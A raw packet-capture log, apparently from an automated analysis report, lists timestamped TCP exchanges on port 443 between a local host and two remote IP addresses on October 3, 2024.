Oct 3, 2024 09:27:43.225650072 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.225660086 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.225703955 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.225727081 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.226105928 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.226152897 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.226190090 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.226202965 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.226231098 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.226250887 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232001066 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232048035 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232084036 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232110023 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232127905 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232175112 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232400894 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232443094 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232470989 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232475996 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232510090 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232527971 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232798100 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232844114 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232872963 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232877970 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.232897997 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.232923985 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.233268023 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.233309031 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.233356953 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.233361959 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.233388901 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.233413935 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.315782070 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.315846920 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.315871954 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.315901041 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.315917969 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.315939903 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.316123009 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.316178083 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.316201925 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.316209078 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.316231012 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.316299915 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.316499949 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.316550970 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.316580057 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.316586971 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.316606045 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.316637039 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.317075014 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.317118883 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.317152977 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.317161083 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.317193985 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.317343950 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.322982073 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323035955 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323065042 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323082924 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323098898 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323117971 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323162079 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323215008 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323237896 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323242903 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323318005 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323441029 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323488951 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323503971 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323525906 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323657990 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323870897 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323920965 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323947906 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323952913 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.323973894 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.323997021 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407121897 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407191038 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407217979 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407250881 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407269955 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407286882 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407432079 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407471895 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407486916 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407495022 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407521963 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407538891 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407574892 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407618999 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407639980 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407648087 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.407663107 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.407715082 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.408205032 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.408253908 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.408288002 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.408301115 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.408319950 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.408339977 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.413933039 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.413975954 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414006948 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414031982 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414050102 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414089918 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414139032 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414149046 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414172888 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414197922 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414228916 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414727926 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414768934 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414788961 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414802074 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.414819956 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414850950 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.414958000 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.415002108 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.415023088 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.415031910 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.415062904 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.415080070 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.497241974 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.497266054 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.497322083 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.497353077 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.497370005 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.497374058 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.497386932 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.497390985 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.497406006 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.497416973 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.497436047 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.497440100 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.497457027 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.497474909 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.498061895 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.498076916 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.498152018 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.498162985 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.498178959 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.498223066 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.498428106 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.498441935 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.498482943 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.498490095 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.498509884 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.498541117 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.504514933 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.504534006 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.504590034 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.504611969 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.504626036 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.504704952 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.504968882 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.504983902 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505068064 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.505068064 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.505076885 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505112886 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.505573034 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505589962 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505654097 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.505661011 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505696058 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.505871058 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505887985 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505925894 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.505932093 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.505958080 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588016987 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588046074 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588116884 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588146925 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588165045 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588285923 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588308096 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588345051 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588351011 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588368893 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588401079 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588762045 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588778019 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588838100 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588846922 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.588857889 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.588896990 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.589294910 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.589309931 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.589373112 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.589384079 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.589441061 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.595520020 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.595561981 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.595635891 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.595659018 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.595695972 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.595698118 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.595724106 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.595760107 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.595768929 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.595789909 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.595797062 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.595819950 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.595845938 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.596122026 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.596163988 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.596200943 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.596209049 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.596230030 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.596250057 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.596539974 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.596581936 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.596657038 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.596657038 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.596667051 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.596708059 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.678719997 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.678740978 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.678839922 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.678877115 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.678925037 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.679053068 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679068089 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679127932 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.679135084 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679173946 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.679583073 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679598093 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679652929 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.679660082 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679701090 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.679897070 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679910898 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.679965973 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.679970980 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.680023909 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.686007023 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686029911 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686090946 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.686115026 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686131954 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.686156034 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.686260939 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686281919 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686332941 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.686338902 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686381102 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.686754942 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686772108 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686822891 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.686831951 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.686867952 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.687177896 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.687196016 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.687252045 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.687258005 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.687298059 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.769335032 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.769356966 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.769432068 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.769485950 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.769512892 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.769551039 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.769809961 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.769829035 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.769865036 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.769874096 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.769903898 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.769920111 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.770241022 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.770256996 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.770287991 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.770301104 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.770325899 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.770339012 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.770689011 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.770705938 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.770757914 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.770780087 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.770838022 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.776653051 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.776669979 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.776772976 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.776772976 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.776833057 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777020931 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.777021885 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777035952 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777055979 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777089119 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.777101994 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777118921 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777142048 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.777157068 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.777168989 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777190924 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:43.777235985 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.779474974 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:43.927681923 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:43.927738905 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:43.927829981 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:43.928316116 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:43.928332090 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.417762995 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.417850971 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.419706106 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.419719934 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.420025110 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.421178102 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.467405081 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818717003 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818773031 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818798065 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818828106 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818882942 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818902016 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818902016 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.818943977 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.818964005 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.818964005 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.869879007 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.877435923 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.877502918 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.877549887 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.877582073 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.877587080 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.877609015 CEST	443	49708	188.114.96.3	192.168.2.9
